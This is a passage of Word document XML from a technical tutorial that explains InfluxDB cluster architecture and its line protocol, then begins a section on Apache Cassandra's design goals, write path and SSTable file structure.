      <w:r w:rsidRPr="005C5B1F">
        <w:t>InfluxDB cluster architecture (InfluxDB Enterprise / Cloud):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6292D844" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="367FA276" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Ingestor nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59886913" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Receive write requests (HTTP, UDP, Telegraf agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133E06E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Write to WAL (local durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35D6B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Write to in-memory cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A3260" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Route data to appropriate storage nodes (sharding by time + series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB39D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F16799D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Storage nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C448921" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Own specific time ranges (sharding by time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D6BAB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Recent data (last 24h): hot storage (NVMe SSD, all in memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112826D6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Older data (7d-30d): warm storage (SSD, partially in memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C669D8F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Historical data (30d+): cold storage (HDD or object storage S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B74B2C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB90C0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Query nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D17AD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Receive PromQL, Flux, or InfluxQL queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02207E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Parse, plan, scatter to relevant storage nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA530AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Gather, merge, apply functions (rate, derivative, aggregations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4951CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Return results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D460CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92297C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Meta nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E3670" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Store cluster metadata (shard assignments, series cardinality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B4FF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Raft consensus for metadata consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10877227" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732F738" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Data model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942E9E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  measurement: table-like concept ("cpu", "temperature", "http_requests")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713EC21" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  tags: indexed key-value pairs (low cardinality, used for filtering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32568415" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  fields: unindexed values (the actual numeric or string measurements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15E828" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  timestamp: nanosecond precision (default), configurable precision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7807CC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACFD89B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Line protocol (write format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B56E55" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  cpu,host=web01,region=us-east user=23.4,system=5.1 1705315200000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055652F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  │── measurement ──│── tags ──│──── fields ────│── timestamp (ns) ──│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9043A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="774A3ABB">
          <v:rect id="_x0000_i5959" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E40EA2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part II: Apache Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F124B25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Cassandra Actually Is (Beyond "Wide-Column Store")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9B2AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distributed, wide-column database designed for write-heavy workloads requiring linear horizontal scalability, geographic distribution, and fault tolerance with no single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> — at the cost of relaxed consistency guarantees and limited query flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A81700" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The "wide-column" description is technically accurate but misleading. Cassandra's data model is better understood as a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distributed hash map of sorted maps</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>: the outer map is keyed by partition key (determining which node owns the data), and the inner sorted map contains an arbitrary number of column-value pairs sorted by a clustering key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30871C6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The genesis problem Cassandra was built to solve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59D7F0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Amazon's Dynamo (2007) and Google's Bigtable (2006) were the twin inspirations. The problem: a global e-commerce platform where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDEC53" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Every write must succeed, even during network partitions or datacenter failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582019B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write throughput must scale linearly by adding hardware — no upper bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286B115" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>No single node failure should cause data unavailability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444504A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Reads and writes should have predictable, low latency at any scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC902AC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>These requirements are irreconcilable with strong ACID consistency — Cassandra explicitly chose availability and partition tolerance over consistency (AP in CAP), with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tunable consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> that lets operators choose their trade-off per operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59784784" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Storage Engine — SSTables and the LSM-Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C7448" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5EC7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra's storage engine (derived from Bigtable's SSTable + log-structured merge):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE347A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="54200795" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFC21B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1. Commit log (WAL): sequential append to commit log (disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5683FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Durability guarantee: if node crashes, commit log enables recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E125641" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6083D12E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2. Memtable: in-memory sorted data structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCBC2F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Partitioned by partition key (hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC352F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Within each partition: sorted by clustering key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A212B4F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Multiple column families (tables) have separate memtables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45874A5E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723CDBBA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  3. When memtable exceeds threshold (default: 1/4 of heap):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C657C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Flush to SSTable (Sorted String Table) on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21FB4F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Memtable reset to empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2B7E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045E738" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SSTable format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C42212" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Immutable once written — never modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BAE07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Sorted by: partition key (token) → clustering key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F304A2A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99FE68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Data file (.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C1AAC2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Partition data stored contiguously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C09930" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Columns within partition sorted by clustering key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C18F91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD924F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Index file (-Index.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D29200" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Partition key → byte offset in data file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137F7C5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Enables: binary search for partition location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B291E74" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13821279" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Summary file (-Summary.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B66A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Sparse index of the Index file (every Nth entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CEA95" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Fits in memory → reduces disk reads for partition lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D702387" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FF1DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Filter file (-Filter.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BECD5B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Bloom filter: "does partition key X exist in this SSTable?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8F1A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Eliminates unnecessary SSTable reads for absent keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA7199" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4D8B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Statistics (-Statistics.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519DD89" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Min/max timestamps, partition sizes, column statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C54A570" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Used for query optimization and compaction decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B9D45" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD22E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Compression info (-CompressionInfo.db):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420D2A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
